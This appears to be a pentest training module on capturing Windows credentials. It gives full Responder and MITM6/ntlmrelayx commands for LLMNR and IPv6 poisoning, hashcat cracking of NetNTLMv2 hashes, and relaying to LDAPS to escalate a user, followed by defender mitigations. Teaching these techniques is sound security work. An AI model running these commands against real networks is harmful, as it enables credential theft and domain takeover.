Last updated: April 29, 2026
Most internal pentests start with passive listening. Responder + MITM6 capture authentication attempts and convert them to crackable hashes.
Responder — LLMNR/NBT-NS poisoning
When Windows can’t resolve a name via DNS, it falls back to LLMNR/NBT-NS broadcasts. Responder answers them, claiming to be the target. Victim authenticates to Responder; NetNTLMv2 hashes captured.
sudo responder -I eth0 -wF
# Wait. Hashes appear in Responder's log.
# Crack
hashcat -m 5600 hashes.txt rockyou.txt -r OneRule.ruleMITM6 — IPv6 SLAAC poisoning
Most networks dual-stack but only manage IPv4. MITM6 advertises itself as the IPv6 router via Router Advertisements; clients prefer IPv6; traffic flows through MITM6.
Combined with ntlmrelayx: capture authentications and relay to LDAP / SMB / HTTP for privilege escalation.
mitm6 -i eth0 -d corp.local
# In another terminal:
ntlmrelayx.py -6 -wh wpad-fake -t ldaps://dc.corp.local --escalate-user lowprivDefender
- Disable LLMNR + NBT-NS via GPO
- Configure DHCPv6 properly or disable IPv6 if not needed
- Enable SMB signing (mandatory)
- Network segmentation; limit broadcast domain
Module Quiz · 5 questions
Pass with 80%+ to mark this module complete. Unlimited retries. Each question shows an explanation.
Custom team training + practitioner advisory
Beyond the free academy — we run private workshops, vCISO advisory, and red-team exercises tailored to your stack. For Indian SMBs scaling past their first hire.